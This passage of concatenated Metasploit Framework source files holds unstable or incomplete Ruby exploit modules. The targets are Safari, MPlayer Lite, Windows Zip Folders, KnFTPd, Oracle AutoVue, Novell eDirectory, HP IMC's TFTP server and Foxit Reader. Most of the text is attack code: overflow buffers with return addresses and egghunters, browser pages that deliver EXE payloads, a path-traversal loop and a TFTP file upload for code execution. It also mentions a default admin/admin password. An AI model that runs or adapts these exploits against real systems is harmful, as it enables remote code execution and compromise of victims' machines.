| print_status("Sending evil feed to #{cli.peerhost}:#{cli.peerport}...") 87 | 88 | sets = [("A".."Z").to_a.join, ("a".."j").to_a.join, ("k".."z").to_a.join] 89 | pattern = Rex::Text.pattern_create(1000, sets) 90 | 91 | pattern[207,4] = [target.ret].pack("V") 92 | pattern[211,4] = [target['Where']].pack("V") 93 | # For debug heap 94 | #pattern[223,4] = [target.ret].pack("V") 95 | #pattern[227,4] = [0x78787878].pack("V") 96 | 97 | content = '' + "\n" + 98 | '' + "\n" + 100 | ' ]>\n" + 103 | 'text' + "\n" 106 | headers["Content-Type"] = "text/xml" 107 | end 108 | send_response(cli, content, headers) 109 | 110 | # Handle the payload 111 | handler(cli) 112 | 113 | end 114 | 115 | end 116 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/safari_float.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::HttpServer::HTML 19 | 20 | #include Msf::Exploit::Remote::BrowserAutopwn 21 | #autopwn_info({ 22 | # :ua_name => HttpClients::SAFARI, 23 | # :javascript => true, 24 | # :rank => NormalRanking, # reliable memory corruption 25 | # :vuln_test => nil, 26 | #}) 27 | 28 | def initialize(info = {}) 29 | super(update_info(info, 30 | 'Name' => '[INCOMPLETE] Safari Floating Point Number Parsing Overflow', 31 | 'Description' => %q{ }, 32 | 'License' => BSD_LICENSE, 33 | 'Author' => [ 'egypt' ], 34 | 'Version' => '$Revision$', 35 | 'References' => 36 | [ 37 | #['BID', ''], 38 | #['CVE', ''], 39 | ], 40 | 'Platform' => [ 'win' ], 41 | 'Payload' => 42 | { 43 | 'Space' => 1024, 44 | 'BadChars' => "\x00", 45 | 'DisableNops' => true, 46 | }, 47 | 'Targets' => 48 | [ 49 | # Target 0: Automatic 50 | [ 51 | 'Windows Safari 3.2.1 via libxml2.dll', 52 | { 53 | 'Ret' => 0xdeadbeef, # call eax; libxml2.dll 54 | }, 55 | ], 56 | ], 57 | 'DefaultTarget' => 0)) 58 | end 59 | 60 | def on_request_uri(cli, request) 61 | # Re-generate the payload 62 | p = regenerate_payload(cli) 63 | if (p == nil) 64 | send_not_found(cli) 65 | return 66 | end 67 | 68 | headers = { 69 | 'Cache-control' => 'must-revalidate', 70 | 'Expires' => '0' 71 | } 72 | case request.uri 73 | when get_resource() 74 | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 75 | 76 | num = "1"*3658 77 | content = "" 78 | content << "" 81 | content << "" 82 | end 83 | send_response(cli, content, headers) 84 | 85 | # Handle the payload 86 | handler(cli) 87 | 88 | end 89 | 90 | end 91 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/fileformat/mplayer_lite_m3u.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::FILEFORMAT 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'MPlayer Lite r33064 Buffer Overflow', 22 | 'Description' => %q{ 23 | This module exploits a buffer overflow in MPlayer Lite r33064. When 24 | the application is used to import a specially crafted m3u file, a buffer overflow occurs 25 | allowing arbitrary code execution. 26 | }, 27 | 'License' => MSF_LICENSE, 28 | 'Author' => 29 | [ 30 | 'C4SS!0 And h1ch4m', # Original Exploit 31 | 'SmilingWolf' # MSF Module 32 | ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | [ 'BID', '46926'], 37 | [ 'URL', 'http://www.exploit-db.com/exploits/17013/' ], 38 | ], 39 | 'DefaultOptions' => 40 | { 41 | 'EXITFUNC' => 'seh', 42 | 'DisablePayloadHandler' => 'true', 43 | }, 44 | 'Payload' => 45 | { 46 | 'Space' => 1000, 47 | 'BadChars' => "\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f" 48 | }, 49 | 'Platform' => 'win', 50 | 'Targets' => 51 | [ 52 | [ 'Windows Universal', { 'Ret' => 0x6B04FCDE, 'Offset' => 5152 } ], # p/p/r in MPlayer.exe 53 | ], 54 | 'Privileged' => false, 55 | 'DisclosureDate' => 'Mar 19 2011', 56 | 'DefaultTarget' => 0)) 57 | 58 | register_options( 59 | [ 60 | OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), 61 | ], self.class) 62 | 63 | end 64 | 65 | def exploit 66 | 67 | sploit = "\x90" * 100 68 | sploit << payload.encoded 69 | 70 | sploit2 = "\x41" * (5152-sploit.length) 71 | sploit2 << "\xeb\x0f\xcc\xcc" 72 | sploit2 << [target.ret].pack('V') 73 | sploit2 << "\x90" * 15 74 | sploit2 << "\xE9\xD4\xEB\xFF\xFF" 75 | sploit2 << "\x90" * 400 76 | filesploit = sploit + sploit2 77 | 78 | print_status("Creating '#{datastore['FILENAME']}' file ...") 79 | 80 | file_create('http:// ' + filesploit) 81 | 82 | end 83 | 84 | end 85 | 86 | =begin 87 | http://dev.metasploit.com/redmine/issues/4097 88 | =end 89 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/fileformat/ms04_034_zip_folders.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'rex/zip' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | Rank = GreatRanking 18 | 19 | include Msf::Exploit::FILEFORMAT 20 | include Msf::Exploit::Remote::Seh 21 | 22 | def initialize(info = {}) 23 | super(update_info(info, 24 | 'Name' => '[INCOMPLETE] Windows Zip File Handling Stack Buffer Overflow', 25 | 'Description' => %q{ 26 | This module exploits a stack-based buffer overflow vulnerability in 27 | Windows Zip Folders prior to MS04-034. 28 | 29 | In order for the command to be executed, an attacker must convince someone to 30 | open a specially crafted zip file and ?? 31 | 32 | By doing so, an attacker can execute arbitrary 33 | code as the victim user. 34 | }, 35 | 'License' => MSF_LICENSE, 36 | 'Author' => 37 | [ 38 | 'Tarako', 39 | 'jduck' 40 | ], 41 | 'Version' => '$Revision$', 42 | 'References' => 43 | [ 44 | [ 'CVE', '2004-0575' ], 45 | [ 'MSB', 'MS04-034' ], 46 | [ 'OSVDB', '10695' ], 47 | [ 'OSVDB', '12252' ], 48 | [ 'BID', '34044' ], 49 | [ 'URL', 'http://research.eeye.com/html/advisories/published/AD20041012A.html' ] 50 | ], 51 | 'Platform' => [ 'win' ], 52 | 'Payload' => 53 | { 54 | 'Space' => 0x800, 55 | 'BadChars' => '' 56 | }, 57 | 'Targets' => 58 | [ 59 | ['Windows Universal', { 'Ret' => 0x41424344 }], # p/p/r 60 | ], 61 | 'DisclosureDate' => 'Oct 12 2004', 62 | 'DefaultTarget' => 0)) 63 | 64 | register_options( 65 | [ 66 | OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), 67 | ], self.class) 68 | 69 | end 70 | 71 | 72 | def exploit 73 | 74 | # XXX: Unable to trigger on XP SP1 75 | fname = Rex::Text.pattern_create(0x9200) 76 | 77 | content = rand_text_alphanumeric(rand(2048)) 78 | 79 | zip = Rex::Zip::Archive.new 80 | xtra = [0xdac0ffee].pack('V') 81 | comment = [0xbadc0ded].pack('V') 82 | zip.add_file(fname, content, xtra, comment) 83 | 84 | # Create the file 85 | print_status("Creating '#{datastore['FILENAME']}' file...") 86 | 87 | file_create(zip.pack) 88 | end 89 | 90 | end 91 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/ftp/knftp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Ftp 18 | include Msf::Exploit::Remote::Egghunter 19 | 20 | def initialize(info = {}) 21 | super(update_info(info, 22 | 'Name' => 'KnFTPd 1.0.0 Server Remote Buffer Overflow Vulnerability', 23 | 'Description' => %q{ 24 | This module exploits a vulnerability in the KnFTP FTP service without 25 | authenticated required, A long FTP command value will result in a 26 | buffer overflow. This Allows you to gain control as the user who 27 | started the application. 28 | 29 | }, 30 | 'License' => MSF_LICENSE, 31 | 'Author' => 32 | [ 33 | 'Qixu Liu', # Original discovery 34 | 'Blake', # Orginal exploit 35 | 'TecR0c ', # Metasploit module 36 | ], 37 | 'Version' => '$Revision$', 38 | 'References' => 39 | [ 40 | [ 'URL', 'http://secunia.com/advisories/45907' ], 41 | [ 'URL', 'http://www.exploit-db.com/exploits/17819/' ], 42 | [ 'URL', 'http://www.exploit-db.com/exploits/17856/' ], 43 | ], 44 | 'DefaultOptions' => 45 | { 46 | 'EXITFUNC' => 'process', 47 | 'DisablePayloadHandler' => 'false', 48 | }, 49 | 'Platform' => 'win', 50 | 'Payload' => 51 | { 52 | 'BadChars' => "\x00", 53 | 'InitialAutoRunScript' => 'migrate -f', 54 | }, 55 | 56 | 'Targets' => 57 | [ 58 | [ 'Windows XP SP3 English', 59 | { 60 | 'Ret' => 0x662eb24f, 61 | 'Offset' => 284 62 | } 63 | ], # JMP ESP - hnetcfg.dll 64 | ], 65 | 'Privileged' => false, 66 | 'DisclosureDate' => 'Sep 02 2011', 67 | 'DefaultTarget' => 0)) 68 | 69 | end 70 | 71 | def exploit 72 | 73 | # Used egghunter since payload space between start of buffer and EIP is to small for 74 | # meterpreter payload 75 | hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) 76 | 77 | buffer = egg 78 | buffer << rand_text_alpha(target['Offset']-buffer.length) 79 | buffer << [target.ret].pack('V') 80 | buffer << make_nops(4) 81 | buffer << hunter 82 | 83 | # If you overwrite SEH it only adds 65 bytes past EIP 84 | 85 | print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}") 86 | 87 | connect 88 | send_cmd(['PASS', buffer], true) 89 | handler 90 | disconnect 91 | end 92 | end 93 | 94 | 95 | =begin 96 | http://dev.metasploit.com/redmine/issues/5471 97 | =end -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/http/oracle_autovue.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = GoodRanking 16 | 17 | include Msf::Exploit::Remote::HttpServer::HTML 18 | include Msf::Exploit::EXE 19 | 20 | def initialize(info={}) 21 | super(update_info(info, 22 | 'Name' => "Oracle AutoVue 20.0.1 SaveViewStateToFile Vulnerability", 23 | 'Description' => %q{Module Description}, 24 | 'License' => MSF_LICENSE, 25 | 'Version' => "$Revision$", 26 | 'Author' => 27 | [ 28 | 'rgod', #Initial discovery, poc 29 | 'sinn3r', #Metasploit 30 | ], 31 | 'References' => 32 | [ 33 | ['BID', '50321'], 34 | ['URL', 'http://www.exploit-db.com/exploits/18016/'] 35 | ], 36 | 'Payload' => 37 | { 38 | 'BadChars' => "", 39 | }, 40 | 'DefaultOptions' => 41 | { 42 | 'ExitFunction' => "none", 43 | 'InitialAutoRunScript' => 'migrate -f', 44 | }, 45 | 'Platform' => 'win', 46 | 'Targets' => 47 | [ 48 | [ 'Windows', {} ], 49 | ], 50 | 'Privileged' => false, 51 | 'DisclosureDate' => "Apr 1 2011", 52 | 'DefaultTarget' => 0)) 53 | end 54 | 55 | def on_request_uri(cli, request) 56 | #If the client isn't Win / IE, no point to continue 57 | agent = request.headers['User-Agent'] 58 | if agent !~ /Windows NT \d\.\d/ or agent !~ /MSIE \d\.\d/ 59 | print_error("Target not supported: #{agent.to_s}") 60 | send_not_found(cli) 61 | return 62 | end 63 | 64 | print_status(request.uri) 65 | 66 | # Send our payload if requested 67 | if request.uri =~ /MicroStation\.dgn/ 68 | return if ((p = regenerate_payload(cli)) == nil) 69 | exe = generate_payload_exe({ :code => p.encoded }) 70 | print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") 71 | send_response(cli, exe, {'Content-Type' => 'application/octet-stream'}) 72 | return 73 | end 74 | 75 | # Get our server's IP 76 | if datastore['SRVHOST'] == '0.0.0.0' 77 | host_ip = Rex::Socket.source_address(cli.peerhost) 78 | else 79 | host_ip = datastore['SRVHOST'] 80 | end 81 | 82 | # Server's endpoint 83 | host = host_ip + ":" + datastore['SRVPORT'] 84 | 85 | src_path = "http://#{host}#{get_resource()}/MicroStation.dgn" 86 | 87 | js = <<-JS 88 | obj.SRC = "#{src_path}"; 89 | obj.RestoreViewStateFromFile("http://#{host}#{get_resource()}/sample.dmp"); 90 | for (i=0; i<6666; i++) { 91 | try { 92 | obj.SaveViewStateToFile("../../../../../../../../../../boot.ini"); 93 | } 94 | catch(e) { 95 | } 96 | } 97 | JS 98 | 99 | html = <<-HTML 100 | 101 | 102 | 103 | 106 | 107 | HTML 108 | 109 | print_status("Sending HTML to: #{cli.peerhost}:#{cli.peerport}...") 110 | send_response(cli, html, {'Content-Type' => 'text/html'}) 111 | end 112 | 113 | def exploit 114 | @payload_name = rand_text_alpha(5) + ".dgn" 115 | super 116 | end 117 | end 118 | 119 | =begin 120 | Testing version: 121 | Oracle AutoVue Electro-Mechanical Professional 20.0.2 Desktop Version 122 | Build 790: 2011-08-29 123 | 124 | Not vulnerable? 125 | MD5 (AutoVueX.ocx) = eb32aa5068b843f8ebb4d4b83eb5e5ab 126 | SHA1(AutoVueX.ocx)= dce6f88870c8fe1ff7c50db50d4a3db4947cbdd4 127 | =end -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/misc/edirectory_dhost_module.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::Tcp 19 | include Msf::Exploit::Remote::Seh 20 | 21 | def initialize(info = {}) 22 | super(update_info(info, 23 | 'Name' => '[INCOMPLETE] Novell eDirectory NDS DHOST Module Name Overflow', 24 | 'Description' => %q{ 25 | This module exploits a stack overflow in Novell eDirectory 8.8.5. 26 | }, 27 | 'Author' => 'hdm', 28 | 'License' => MSF_LICENSE, 29 | 'Version' => '$Revision$', 30 | 'References' => 31 | [ 32 | 33 | ], 34 | 'DefaultOptions' => 35 | { 36 | 'EXITFUNC' => 'seh' 37 | }, 38 | 'Payload' => 39 | { 40 | 'Space' => 600, 41 | 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 42 | 'StackAdjustment' => -3500, 43 | }, 44 | 'Platform' => 'win', 45 | 'Targets' => 46 | [ 47 | [ 'Novell eDirectory 8.8.5', { 'Ret' => 0xcccccccc } ], # ntls.dll 48 | ], 49 | 50 | 'Privileged' => true, 51 | 52 | 'DisclosureDate' => 'Nov 10 2008', 53 | 54 | 'DefaultTarget' => 0)) 55 | 56 | register_options([ 57 | Opt::RPORT(8030), 58 | OptString.new('USERNAME', [true, "A valid username for the eDirectory server", "admin"]), 59 | OptString.new('PASSWORD', [true, "A valid password for the eDirectory server"]), 60 | OptBool.new('SSL', [true, 'Use SSL', true]) 61 | ], self.class) 62 | end 63 | 64 | def exploit 65 | 66 | print_status("Obtaining a session cookie from the server...") 67 | connect 68 | req = "GET /dhost/ HTTP/1.1\r\n" 69 | req << "Host: #{rhost}:#{rport}\r\n" 70 | req << "Connection: close\r\n\r\n" 71 | sock.put(req) 72 | res = sock.get_once(-1,5) 73 | disconnect 74 | 75 | cookie = nil 76 | if(res =~ /Set-Cookie:\s*([^\s]+)\s*/mi) 77 | cookie = $1 78 | cookie,junk = cookie.split(';') 79 | end 80 | 81 | if(not cookie) 82 | print_error("Could not read the cookie value from the eDirectory server") 83 | return 84 | end 85 | 86 | print_status("Authenticating to the server as #{datastore['USERNAME']}") 87 | 88 | connect 89 | data = "usr=#{Rex::Text.uri_encode(datastore['USERNAME'])}&pwd=#{Rex::Text.uri_encode(datastore['PASSWORD'])}&Login=Login" 90 | req = "POST /_LOGIN_SERVER_RSP_ HTTP/1.1\r\n" 91 | req << "Host: #{rhost}:#{rport}\r\n" 92 | req << "Content-Type: application/x-www-form-urlencoded\r\n" 93 | req << "Content-Length: #{data.length}\r\n" 94 | req << "Cookie: #{cookie}\r\n\r\n#{data}" 95 | 96 | sock.put(req) 97 | res = sock.get_once(-1, 5) 98 | disconnect 99 | 100 | if(res !~ /dhost/) 101 | print_status("Invalid login information") 102 | return 103 | end 104 | 105 | print_status("Triggering the overflow...") 106 | 107 | connect 108 | 109 | # Fails on 2003 SP2, SEH/STACK both blocked 110 | 111 | buff = ::Rex::Text.pattern_create(2000) 112 | # buff[1644,4] = [0x10020202].pack("V") 113 | 114 | req = "GET /dhost/modules?L\x3a#{buff} HTTP/1.1\r\n" 115 | req << "Host: #{rhost}:#{rport}\r\n" 116 | req << "Cookie: #{cookie}\r\n\r\n" 117 | sock.put(req) 118 | 119 | handler 120 | disconnect 121 | end 122 | 123 | end 124 | 125 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/tftp/hp_imc_err.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Udp 18 | 19 | def initialize(info={}) 20 | super(update_info(info, 21 | 'Name' => "[INCOMPLETE] HP Intelligent Management Center tftpserver ERROR Vulnerability", 22 | 'Description' => %q{ 23 | This module exploits a vulnerability found on HP Intelligent Management Center's 24 | TFTP service. By either supplying a malformed DATA or ERROR TFTP packet, the process 25 | will copy the user input into a fixed-length buffer on the stack, which results in 26 | arbitrary code execution under the context of the SYSTEM user. 27 | 28 | Note: If the user input exceeds 1100 bytes, the vulnerable code won't trigger. Even if 29 | you're able to trigger it (send about 1000 bytes), overwrite the SEH, /GS is still 30 | enabled, and we don't seem to be raising an exception before @__security_check_cookie() 31 | is called (which leads to kernel32.TerminateProcess). Also, all loded modules are safeseh 32 | protected. Use an address outside the range of loaded modules, perhaps? 33 | 34 | The copying routine is at 0x405331 (XP SP3). 35 | }, 36 | 'License' => MSF_LICENSE, 37 | 'Version' => "$Revision$", 38 | 'Author' => 39 | [ 40 | 'sinn3r', #Metasploit 41 | ], 42 | 'References' => 43 | [ 44 | [ 'CVE', '2011-1852' ], 45 | [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-164/' ], 46 | [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02822750' ], 47 | ], 48 | 'Payload' => 49 | { 50 | 'Space' => 500, 51 | 'BadChars' => "\x00", 52 | 'StackAdjustment' => -3500, 53 | }, 54 | 'DefaultOptions' => 55 | { 56 | 'ExitFunction' => "seh", #none/process/seh 57 | }, 58 | 'Platform' => 'win', 59 | 'Targets' => 60 | [ 61 | [ 'Windows XP SP3', {'Ret'=>0x41414141} ], 62 | ], 63 | 'Privileged' => false, 64 | 'DisclosureDate' => "Apr 1 2011", 65 | 'DefaultTarget' => 0)) 66 | end 67 | 68 | def exploit 69 | print_status("Sending packet...") 70 | 71 | connect_udp 72 | 73 | #1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err 74 | #http://www.freesoft.org/CIE/RFC/1350/5.htm 75 | 76 | #Initial packet. Probably don't need to use this. 77 | =begin 78 | pkt = '' 79 | pkt << "\x00\x05" #Opcode 80 | pkt << "\x41"*4 #Filename 81 | pkt << "\x00" #Null byte terminator 82 | pkt << "netascii" #Mode 83 | pkt << "\x00" #Null byte terminator 84 | =end 85 | 86 | #Data packet 87 | data = '' 88 | data << "\x00\x03" #Opcode 89 | data << "\x00\x01" #Block number 90 | data << "\x41"*1000 #Data 91 | 92 | #Error packet 93 | err = '' 94 | err << "\x00\x05" #Opcode 95 | err << "\x00\x01" #Error code 96 | err << "\x41"*550 #Message 97 | err << "\x00" #Null byte terminator 98 | 99 | udp_sock.put(err) 100 | 101 | disconnect_udp 102 | end 103 | end 104 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/tftp/hp_imc_wrq.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Udp 18 | include Msf::Exploit::EXE 19 | 20 | def initialize(info={}) 21 | super(update_info(info, 22 | 'Name' => "[INCOMPLETE] HP Intelligent Management Center tftpserver WRQ Remote Code Execution Vulnerability", 23 | 'Description' => %q{ 24 | The flaw exists within the tftpserver.exe component which listens by default on UDP port 69. 25 | When handling WRQ opcode types the server allows arbitrary file creation. Additionally, the 26 | server is configured to truncate/overwrite existing files. This process is owned by the SYSTEM 27 | user. A remote attacker can exploit this vulnerability to execute arbitrary code under the 28 | context of the SYSTEM user. --- ZDI 29 | 30 | Note: By default, the files are stored in the follwoing folder. And this appears to be the only 31 | place to upload our stuff to (attempt to anywhere else will just give us an access denied, even 32 | if the location has full control set for 'Everyone'): 33 | C:\Program Files\iMC\server\tmp\ 34 | 35 | tftpserver.exe is not in that directory. 36 | 37 | The only possible ways to gain code exeuction is under one of these: 38 | 1. The user manually clicks on the binary 39 | 2. C:\Program Files\iMC\server\tmp\ also happens to be a web directory 40 | 41 | ** Still investigating if it's possible to traverse our way out. Or at least use another vuln ( 42 | if any) to execute our binry in C:\Program Files\iMC\server\tmp\ ** 43 | 44 | Default password for Intelligent Management on port 8080: admin/admin 45 | }, 46 | 'License' => MSF_LICENSE, 47 | 'Version' => "$Revision$", 48 | 'Author' => 49 | [ 50 | 'sinn3r', #Metasploit 51 | ], 52 | 'References' => 53 | [ 54 | [ 'CVE', '2011-1849' ], 55 | [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-161/' ], 56 | ], 57 | 'Payload' => 58 | { 59 | 'Space' => 500, 60 | 'BadChars' => "\x00", 61 | 'StackAdjustment' => -3500, 62 | }, 63 | 'DefaultOptions' => 64 | { 65 | 'ExitFunction' => "seh", #none/process/seh 66 | }, 67 | 'Platform' => 'win', 68 | 'Targets' => 69 | [ 70 | [ 'Windows XP SP3', {'Ret'=>0x41414141} ], 71 | ], 72 | 'Privileged' => false, 73 | 'DisclosureDate' => "Apr 1 2011", 74 | 'DefaultTarget' => 0)) 75 | end 76 | 77 | def exploit 78 | print_status("Generating payload...") 79 | exe = generate_payload_exe 80 | 81 | print_status("Sending packet...") 82 | 83 | connect_udp 84 | 85 | #1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err 86 | #http://www.freesoft.org/CIE/RFC/1350/5.htm 87 | 88 | #Send a WRQ request to begin the transfer 89 | pkt = '' 90 | pkt << "\x00\x02" #Opcode (WRQ) 91 | pkt << "test.exe" #Filename 92 | pkt << "\x00" #Null byte terminator 93 | pkt << "octet" #Mode 94 | pkt << "\x00" #Null byte terminator 95 | 96 | #Send WRQ 97 | udp_sock.put(pkt) 98 | 99 | #ACK from server 100 | res = udp_sock.recvfrom(1024) 101 | tmp = Rex::Text.to_hex_dump(res.to_s) 102 | print_status("Response:\n#{tmp.chomp}") 103 | 104 | #Same port (69) is used to transfer our data packets. If chunk size is less than 512 bytes, 105 | #it is treated by the TFTP server as the last data packet 106 | counter = 1 107 | 0.step(exe.length, 512) do |i| 108 | block = [counter].pack('n') 109 | data = '' 110 | data << "\x00\x03" #Opcode 111 | data << block #Block number 112 | data << exe[i, 512] #Data 113 | 114 | print_status("Sending block ##{counter.to_s}") 115 | udp_sock.write(data) 116 | 117 | counter += 1 118 | 119 | #See if each data packet is delivered correctly 120 | res = udp_sock.recvfrom(1024) 121 | print_status("Response:\n#{Rex::Text.to_hex_dump(res.to_s).chomp}") 122 | end 123 | 124 | disconnect_udp 125 | end 126 | end 127 | -------------------------------------------------------------------------------- /modules/exploits/unstable/unreliable/windows/fileformat/foxit_pdf_action_bof.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'zlib' 14 | 15 | class Metasploit3 < Msf::Exploit::Remote 16 | Rank = GoodRanking 17 | 18 | include Msf::Exploit::FILEFORMAT 19 | include Msf::Exploit::PDF 20 | include Msf::Exploit::Egghunter 21 | 22 | def initialize(info = {}) 23 | super(update_info(info, 24 | 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow', 25 | 'Description' => %q{ 26 | This module exploits a stack based buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. 27 | }, 28 | 'License' => MSF_LICENSE, 29 | 'Author' => 30 | [ 31 | 'bannedit', # Metasploit module 32 | ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | [ 'CVE' , '2009-0837' ], 37 | [ 'OSVDB', '55614' ], 38 | [ 'BID', '34035'], 39 | [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'], 40 | ], 41 | 'DefaultOptions' => 42 | { 43 | 'EXITFUNC' => 'process', 44 | 'DisablePayloadHandler' => 'true', 45 | }, 46 | 'Payload' => 47 | { 48 | 'Space' => 316, 49 | 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" 50 | }, 51 | 'Platform' => 'win', 52 | 'Targets' => 53 | [ 54 | [ 'Foxit Reader 3.0 Windows XP SP3', { 'Ret' => 0x01847e7a} ], # ebp + offset 55 | ], 56 | 'DisclosureDate' => 'Mar 09 2009', 57 | 'DefaultTarget' => 0)) 58 | 59 | register_options([ 60 | OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), 61 | ], self.class) 62 | 63 | end 64 | 65 | def exploit 66 | pdf = make_pdf 67 | file_create(pdf) 68 | handler 69 | end 70 | 71 | def make_pdf 72 | hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) 73 | 74 | action = "\n<>/NewWindow true>>" 81 | 82 | pdf = "%PDF-1.4\n" 83 | pdf << "1 0 obj\n" 84 | pdf << "<>/Contents 2 0 R " 86 | pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" 87 | pdf << "endobj\n" 88 | pdf << "4 0 obj\n" 89 | pdf << "<>\n" 90 | pdf << "endobj\n" 91 | pdf << "7 0 obj\n" 92 | pdf << "<>\n" 93 | pdf << "endobj\n" 94 | pdf << "9 0 obj\n" 95 | pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" 98 | pdf << "endobj\n" 99 | pdf << "16 0 obj\n" 100 | pdf << action 101 | pdf << "endobj\n" 102 | pdf << "17 0 obj\n" 103 | pdf << "<>\n" 104 | pdf << "endobj\n" 105 | pdf << "trailer\n" 106 | pdf << "<<00000000000000000000000000000000>]" 107 | pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" 108 | pdf << "startxref\n" 109 | pdf << "0000\n" 110 | pdf << "%%EOF\n" 111 | pdf 112 | end 113 | end 114 | 115 | =begin 116 | https://dev.metasploit.com/redmine/issues/5854 117 | =end 118 | -------------------------------------------------------------------------------- /modules/exploits/unstable/unreliable/windows/ftp/solarftp_pasv.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | 16 | include 